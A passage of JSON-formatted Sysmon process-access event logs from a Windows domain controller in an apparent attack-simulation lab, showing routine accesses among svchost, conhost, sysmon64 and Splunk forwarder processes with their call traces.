C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6307,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6308,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6309,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6310,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6311,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6312,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6313,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21A3-5F25-0000-0010649D0900}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21A3-5F25-0000-0010649D0900}","TargetProcessId":"4612","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6314,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:43.523\r\nSourceProcessGUID: {41C8662E-21A3-5F25-0000-0010649D0900}\r\nSourceProcessId: 4612\r\nSourceThreadId: 2624\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:43.523","SourceProcessGUID":"{41C8662E-21A3-5F25-0000-0010649D0900}","SourceProcessId":"4612","SourceThreadId":"2624","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program 